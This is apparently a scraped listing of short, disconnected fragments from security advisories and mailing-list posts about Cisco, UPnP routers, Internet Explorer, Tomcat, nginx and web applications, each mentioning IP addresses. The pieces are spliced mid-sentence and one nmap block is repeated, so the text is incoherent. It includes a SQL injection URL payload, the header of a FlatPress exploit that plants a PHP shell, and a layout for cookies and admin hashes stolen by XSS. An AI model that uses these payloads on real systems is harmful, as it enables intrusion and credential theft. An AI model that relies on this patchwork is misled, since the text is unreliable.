Next Page >>
IP addressing
As a workaround, configure an access control list (ACL) in the
signaling / media VLAN on the Route Processor (RP). The following
examples show how VLAN 140 is configured as the signaling / media
VLAN. A separate VLAN (VLAN 77) is configured as Fault Tolerance
(FT). An ACL is added to the signaling/media VLAN on the RP filtering
all TCP port 2000 packets to the alias IP address.
Cisco SBC configuration
interface vlan 140
ip address 10.140.1.90 255.255.255.0
actually lead to UPnP being exploited remotely, even if the web admin
console is not visible from the Internet!
The following is a non-malicious proof-of-concept exploit which sets
up a port-forwarding rule from port 1337 on the WAN interface to port
445 on the internal IP address 192.168.1.64. Such IP address is the
first usable IP address reserved for clients connected to Speedtouch
and BT Home Hub routers. The exploit has been tested on BT Home Hub -
Firmware version 6.2.6.B. Just to make things clear, UPnP is enabled
by default on the BT Home Hub, just like most IGDs. If your Internet
gateway is a BT Home Hub, clicking on the following link should add a
complete compromise of the entire system.
------------------------------------------------------------------------
IP spoofing
------------------------------------------------------------------------
When a user logs into FWS, the user's IP address is stored in the
database. This is done to prevent replay of (stolen) session cookies. If
FWS is called with a session cookie from a different IP address, the
user will not be logged into FWS. The IP address is obtained using
GetUserIP(). This function first checks whether the HTTP request
contains the X-Forwarded-For or Client-IP HTTP headers. These headers
Vulnerability Information
=======================================
Product: Cisco ACE XML Gateway <= 6.0
Vulnerabily: Internal IP Address Disclosure
Vendor: Cisco Systems, Inc. http://www.cisco.com
Product URL: http://www.cisco.com/en/US/products/ps7314/
Author: nitrus [ Alejandro Hernandez H. ]
Discovery Date: 24/Aug/2009
Attack Vector: Remote
Devices configured for ALPS are vulnerable. The default TCP listening
ports for ALPS are 350 and 10000. The following example shows a
vulnerable ALPS configuration:
alps local-peer <ip address>
Further information about ALPS is available in "Cisco IOS Bridging
and IBM Networking Configuration Guide, Release 12.2 - Configuring
the Airline Product Set" at the following link
http://www.cisco.com/en/US/docs/ios/12_2/ibm/configuration/guide/bcfalps_ps1835_TSD_Products_Configuration_Guide_Chapter.html
Workarounds
===========
There are no workarounds other than disabling NTP on the device. The
following mitigations have been identified for this vulnerability;
only packets destined for any configured IP address on the device can
exploit this vulnerability. Transit traffic will not exploit this
vulnerability.
Note: NTP peer authentication is not a workaround and is still a
vulnerable configuration.
"dlsw local-peer"
or
"dlsw local-peer peer-id <IP address>"
Any version of Cisco IOS prior to the versions which are listed in
the Software Versions and Fixes section below is vulnerable.
To determine the version of Cisco IOS software running on a Cisco
There are some issues in the way IE enforces zone security policies when
an URI is specified in the UNC form (i.e.,
'\\MACHINE_NAME_OR_IP\PATH_TO_RESOURCE'). In this case, Internet
Explorer classifies as *Internet Zone* any UNC address pointing to an IP
address including '127.0.0.1'. As a result, any website (belonging to
any security zone) can address and redirect the navigation flow to files
stored in '\\127.0.0.1'.
If an attacker controlling a website finds a way to store HTML with any
valid scripting code the local file system of the visitor and then
Tomcat 6.0.x is not affected
The unsupported Tomcat 3.x, 4.0.x and 5.0.x versions may be also affected
Description:
Bug 25835 (https://issues.apache.org/bugzilla/show_bug.cgi?id=25835) can,
in very rare circumstances, permit a user from a non-permitted IP address
to gain access to a context protected with a valve that extends
RemoteFilterValve.
Mitigation:
Upgrade to:
What's important to note is that every time an "authenticated" URL is
accessed, there is _no_ authentication data being sent within HTTP
requests whatsoever. There are no passwords, or session IDs being
submitted at all within HTTP requests. Instead, the AP uses the
administrator's source IP address as authentication data.
This means that the authentication state relies on the false assumption
that post-authentication URLs won't be known by an attacker and that the
attacker and the administrator will _not_ share the same source IP
address. By simply accessing administrative URLs in a browser from _the
listed game servers, asking each for its description. The client's parsing of
the servers' responses is vulnerable to a buffer overflow attack.
The client is designed to listen for incoming UDP packets from
master.corservers.com and from the game servers on port 27901, however it will
accept and parse UDP packets from any IP address even if the client did not
initiate a UDP conversation with that given IP address. As such, an attacker
can send a malformed UDP packet from any source IP address; they need not know
a valid game server's IP address to exploit this buffer overflow vulnerability.
When the client receives a UDP packet on port 27901 that specifies a server's
Details
=======
Mobile IP is part of both IPv4 and IPv6 standards. Mobile IP allows a
host device to be identified by a single IP address even though the
device may move its physical point of attachment from one network to
another. Regardless of movement between different networks,
connectivity at the different points is achieved seamlessly without
user intervention. Roaming from a wired network to a wireless or
wide-area network is also possible.
80/tcp open http Dell Embedded Remote Access card webserver 1.0
443/tcp open ssl/http Dell Remote Access Controller http interface 2.0
5900/tcp open vnc?
Service Info: Devices: terminal server, remote management
Nmap finished: 1 IP address (1 host up) scanned in 21.559 seconds
$
To bring the SSH daemon running at the DRAC4 down, the following command
can be used in combination with the already described nmap version:
1. IBM Tivoli Provisioning Manager Express Multiple Cross-Site
Scripting Vulnerabilities
2. IBM Tivoli Provisioning Manager Express Remote Username
Enumeration Weakness
3. Computer Associates eTrust Threat Management Console
IP Address HTML Injection Weakness
4. Gadu-Gadu Skin Attribute Handling Remote Denial of Service
Vulnerability
5. Gadu-Gadu Remote User Addition Vulnerability
> (Restart nginx and run only the second command to see its expected
> behavior; i.e., actually fetching http://www.google.com/.)
>
> This works because crc32("www.google.com.") ==
> crc32("www.google.com.9nyz309.crc32.dempsky.org."). The first request
> cached the IP address for www.google.com.9nyz309.crc32.dempsky.org,
> and then the second request used this IP address instead of querying
> for www.google.com's real IP address because of the matching CRCs and
> the common prefix.
>
> [1] http://marc.info/?l=nginx&m=125257590425747&w=2
If you read your own post you would realize that Mitsubishi
kept the device ipaddress prefix as 192.168.1 so only you can attack
yourself.
192.168 cannot be access from the internet ;-) [unless you NAT at which
point its your NAT config problem]
-----Original Message-----
...
}
}
As we can see in [2] there is unsecure call for function sprintf().
Argument 'name' is RevDNS for IP address. In details exploiting this
situaction will be later becouse normal we can't do that!
Now let's look what call this function:
"display.c"
used to mitigate this vulnerability. UDP port 1975 is a registered
port number that can be used by certain applications. However,
filtering all packets that are destined to UDP port 1975 may cause
some applications to malfunction. Therefore, access lists need to
explicitly deny UDP 1975 packets that are sent to any router
interface IP addresses and permit transit traffic. Such access lists
need to be applied on all interfaces to be effective. Since the IPC
channel uses addresses from the 127.0.0.0/8 range, it is also
necessary to filter packets that are sourced from or destined to this
range. An example is given below:
|
528| if ( $comment_url != '' ) {
529| $save_data[ 'URL' ] = clean_post_text( $comment_url );
530| }
|
531| $save_data[ 'IP-ADDRESS' ] = $user_ip; // New 0.4.8
532| $save_data[ 'MODERATIONFLAG' ] = $hold_flag;
533|
534| // Implode the array
535| $str = implode_with_keys( $save_data );
536|
Cross Site Scripting and Arbitrary File Access vulnerabilities are caused by
assigning a variable from client data in file shopsessionsubs.asp, in
Sub CookielessGenerateFilename:
ipaddress = Request.Servervariables("REMOTE_HOST")
Variable ipaddress is concatenated with other data in
Sub CookielessGenerateFilename to construct a variable filename:
tempname=prefix & "_" & mm & dd & yy & "_" & Ipaddress
--On Wednesday, November 21, 2007 21:45:35 +1100 XSS Worm XSS Security
Information Portal <cross-site-scripting-security@xssworm.com> wrote:
>
> In the case of Yahoo, security firm Finjan said hackers exploited an
> unused IP address within Yahoo's hierarchy and used that as the domain
> address behind a forged Google Analytics domain name. This fooled the
> Finjan Web-filtering product into believing a person was going to a
> highly trusted Yahoo domain. The victims, customers of Finjan, never knew
> they were on a malicious Web site, and neither did the security
> mechanisms on the network. (In this case, Finjan's Web-filtering
80/tcp open http Dell Embedded Remote Access card webserver 1.0
443/tcp open ssl/http Dell Remote Access Controller http interface 2.0
5900/tcp open vnc?
Service Info: Devices: terminal server, remote management
Nmap finished: 1 IP address (1 host up) scanned in 21.559 seconds
$
To bring the SSH daemon running at the DRAC4 down, the following command
can be used in combination with the already described nmap version:
other
hand, a DNS server with recursion sends query with the recursion bit unset
(i.e.
iteration query), the reply has to have this bit unset, too.
C. The tool spoofs the source IP address of the queries. This is useful if
the
attacker does not want leave any trace of his IP address on the server.
D. The tool utilizes CNAME Record Type to inject the false entry. The way
the
Msn messenger 8.5.1
-------------------------------
Description :
The protocol MSNP15 Windows Live Messenger Client 8.5.1 transmit to the
information on the IP address public and private. Everything happens
during a conversation that starts with you in our contacts list.
By analyzing the conversation with Wireshark can be noted that in
addition to passing the information, such as the sessionid, the Cal, the
Ringing, and also pass Ipv4ExternalAddrsAndPorts
> send family
> email, nothing more. He installed Microsoft's Malicious Removal Tool.
> Farmer John's
> machine becomes infected at some point and sends Microsoft information
> about the
> compromise: "I'm Farmer John's machine coming from X_IP_Address".
>
> A correlation is done with this information and then supposedly used to
> track where the
> botnet's originating IP address is from. From the article: "Analysis by
> Microsoft's
PHP shell.
* It exploits the LFI, hides the shell in the cache directory
* and starts a remote command session via POST.
*
* Syntax: php fp-lfi2rce.php <host> <path> [action] [lang] [shell]
* <host>: the hostname or IP address of your target;
* <path>: the path where FlatPress was installed;
* [action]: the action to take against the host system
(test, attack);
* [lang]: the remote language used (en, it);";
* [shell]: if already exploited, you could just have the shell name.
index.php?act=mod&f=-6&CODE=prune_finish&pergo=50¤t=50&max=3&starter=1+union+select+1/*
----[ RECORD ... ]
{
---IP ADDRESS sniffed ip address
---REFERER xssed theme
---COOKIES xssed cookies of forum member
---USER ID xssed user id of forum member
---ADMIN NAME admin username
---ADMIN PASS admin pass hash
: 192
Service Port
: 10
Service Port Mac Address
: 0011.92ff.8742
Service IP Address
: 192.168.10.1
Management IP Address
: 192.168.1.123
Software Version
: 5.1.151.0
Treo Smartphones running the Palm OS are vulnerable to a
remote Denial of Service attack while connected to data
networks allowing inbound ICMP traffic. It is possible for
an attacker to launch this attack from the Internet by sending
specially crafted ICMP requests at the targeted phone's
assigned IP address.
Details:
Sending continuous ICMP echo requests with a packet size of
1470 bytes to the Smartphone's assigned IP address will invoke
For more information on restricting traffic to VTYs, please consult:
http://cisco.com/en/US/products/sw/iosswrel/ps1835/products_command_reference_chapter09186a00800873c8.html#wp1017389
The following example permits access to VTYs from the 192.168.1.0/24
netblock and the single IP address 172.16.1.2 while denying access
from anywhere else:
Router(config)# access-list 1 permit 192.168.1.0 0.0.0.255
Router(config)# access-list 1 permit host 172.16.1.2
Router(config)# line vty 0 4
Next Page>>
|
